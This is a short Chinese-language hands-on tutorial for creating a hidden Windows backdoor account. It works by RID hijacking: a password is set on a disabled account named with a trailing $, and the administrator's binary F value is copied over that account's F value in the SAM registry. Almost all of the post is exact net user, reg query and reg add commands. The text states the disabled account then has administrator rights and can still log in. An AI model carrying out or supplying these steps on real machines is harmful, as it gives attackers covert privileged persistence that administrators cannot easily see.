实战：利用禁用账户创建Windows隐藏账户

实战：利用禁用账户创建Windows隐藏账户

总体思路

1.给禁用账户设置密码
2.查看注册表USER下的隐藏用户所对应的键值关系
3.用administrator的F值信息覆盖我们想要利用的禁用账号的F值

1. 本案例使用系统账户-ceshi$ （该用户已禁用）

   设置已禁用的账户密码
   net user ceshi$ 123456
net user ceshi$ /active:no

2. 找到注册表各用户及用户F值

   • 路径：[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users]

3. 查看用户ceshi$的类型为0X3ec,并以此找到对应存放权限的子项[000003EC]
   

   • 同上，administrator的类型为0x1f4
4. 查看用户注册表F值
   • 用户administrator的F值：
     • 命令：reg query HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users00001F4 /v F
     • F值：[0200010000000000CF2DFBAA4961D9010000000000000000B6483B489F0ED90100000000000000006EF0CCE05E53D901F401000001020000100000000000000000004100010000000000000000000000]
   • 用户ceshi$的F值
     • 命令：reg query HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users00003EC /v F

5. 用administrator的F值替换ceshi$的F值

   • 命令：reg add "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users00003EC" /v F /t REG_BINARY /d 0200010000000000CF2DFBAA4961D9010000000000000000B6483B489F0ED90100000000000000006EF0CCE05E53D901F401000001020000100000000000000000004100010000000000000000000000 /f

6. 说明

   1. 经此操作后，原本禁用的用户ceshi$就获得和administrator同样的权限，且虽然显示为账户已禁用，但实际仍能登录系统。
   2. ==电脑重启以后失效==